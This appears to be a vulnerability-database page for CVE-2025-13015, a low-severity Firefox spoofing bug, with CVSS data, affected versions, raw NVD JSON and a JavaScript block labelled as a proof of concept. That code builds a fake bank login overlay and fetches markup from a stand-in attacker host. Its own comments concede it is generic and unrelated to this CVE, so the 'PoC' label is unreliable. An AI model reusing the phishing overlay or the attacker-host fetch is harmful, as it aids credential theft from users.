Security Vulnerability Report
CVE-2025-13015 CVSS 3.4 LOW

CVE-2025-13015

Published: 2025-11-11 16:15:39
Last Modified: 2026-04-13 15:16:42

Description

Spoofing issue in Firefox. This vulnerability was fixed in Firefox 145, Firefox ESR 140.5, and Firefox ESR 115.30.

CVSS Details

CVSS Score
3.4
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

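cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions before 115.30.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* (versions before 145.0) - VULNERABLE
cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* (versions from 140.0 up to, but not including, 140.5.0) - VULNERABLE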
Firefox < 115.30
Firefox ESR < 115.30
Firefox ESR < 140.5
Firefox < 145

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
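// CVE-2025-13015 Firefox Address Bar Spoofing PoC
// Note: This is for educational/security research purposes only
//
// Reviewer note: the advisory text published for CVE-2025-13015 says only
// "Spoofing issue in Firefox", and the Bugzilla entry it references is tagged
// "Permissions Required". Nothing in this listing is specific to that bug:
// it is a generic illustration of a look-alike page plus a History API call
// that browsers reject for cross-origin URLs. Treat it as illustrative only;
// whether an installation is affected is decided by its version (fixed in
// Firefox 145, Firefox ESR 140.5 and Firefox ESR 115.30).
const poc = {
  /**
   * Step 1: render a full-viewport mock login form inside the current
   * document. Everything happens in the page's own origin, so the address
   * bar keeps showing that origin.
   */
  createSpoofedPage: function () {
    const fakePage = document.createElement('div');
    fakePage.innerHTML = `
      <div style="position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: #ffffff;">
        <h1>Login to Your Bank</h1>
        <form>
          <input type="text" placeholder="Username" />
          <input type="password" placeholder="Password" />
          <button type="submit">Login</button>
        </form>
      </div>
    `;
    document.body.appendChild(fakePage);
  },

  /**
   * Step 2: ask the History API to display a different URL.
   *
   * history.pushState() only accepts URLs that are same-origin with the
   * current document. For a cross-origin target such as the one below a
   * spec-compliant browser throws a SecurityError DOMException and the
   * address bar is left unchanged, so this step is the control that a
   * spoofing bug would have to get around, not a bypass of it.
   *
   * @throws {DOMException} SecurityError when targetUrl is cross-origin.
   */
  manipulateHistory: function () {
    const targetUrl = 'https://www.bank-example.com';
    history.pushState({ path: targetUrl }, '', targetUrl);
  },

  /**
   * Step 3: fetch remote markup and assign it to innerHTML.
   *
   * Not invoked by this script, and no element with the id
   * 'malicious-content' is created anywhere in this listing.
   */
  loadMaliciousContent: function () {
    fetch('https://attacker-controlled-site.com/fake-bank-ui')
      .then(response => response.text())
      .then(html => {
        document.getElementById('malicious-content').innerHTML = html;
      });
  },

  /**
   * Defense detection: reports whether the browser accepts a cross-origin
   * URL in history.pushState().
   *
   * This probes the History API same-origin check in general; it is not a
   * test for CVE-2025-13015, whose details are not given on this page.
   * Comparing the installed Firefox version with the fixed releases is the
   * reliable way to decide exposure.
   *
   * @returns {boolean} false when pushState rejects the cross-origin URL
   *   (the expected outcome), true when the URL was accepted.
   * @throws Rethrows any error other than a SecurityError.
   */
  isVulnerable: function () {
    const testUrl = 'https://test.example.com';
    // Captured before the probe: after a successful pushState,
    // window.location.pathname would describe the test URL, not this page.
    const originalHref = window.location.href;

    try {
      history.pushState({}, '', testUrl);
    } catch (err) {
      // The same-origin check held, which is the secure outcome.
      if (err && err.name === 'SecurityError') {
        return false;
      }
      throw err;
    }

    const accepted = window.location.href.includes(testUrl);
    // Put the displayed URL back. The history entry added by the probe
    // stays in the session history.
    history.replaceState({}, '', originalHref);
    return accepted;
  }
};

// Execute PoC
// Only where a DOM exists, so that loading this file in Node reaches the
// export below instead of failing on `document`.
if (typeof document !== 'undefined') {
  poc.createSpoofedPage();
  // Expected to throw SecurityError in a spec-compliant browser (see
  // manipulateHistory above).
  poc.manipulateHistory();
}

// Export for testing
if (typeof module !== 'undefined' && module.exports) {
  module.exports = poc;
}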

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13015", "sourceIdentifier": "[email protected]", "published": "2025-11-11T16:15:38.573", "lastModified": "2026-04-13T15:16:42.470", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Spoofing issue in Firefox. This vulnerability was fixed in Firefox 145, Firefox ESR 140.5, and Firefox ESR 115.30."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 3.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-290"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.30.0", "matchCriteriaId": "6A363BA6-4A06-4794-B7DF-59B1624097BC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "145.0", "matchCriteriaId": "445D5AED-0882-46FE-A5F1-B7148B923221"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "140.0", "versionEndExcluding": "140.5.0", "matchCriteriaId": "E7561CC5-C090-4099-A311-1A0E304111FE"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=1994164", "source": "[email protected]", "tags": ["Permissions Required"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-87/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-88/", 
"source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2025-89/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}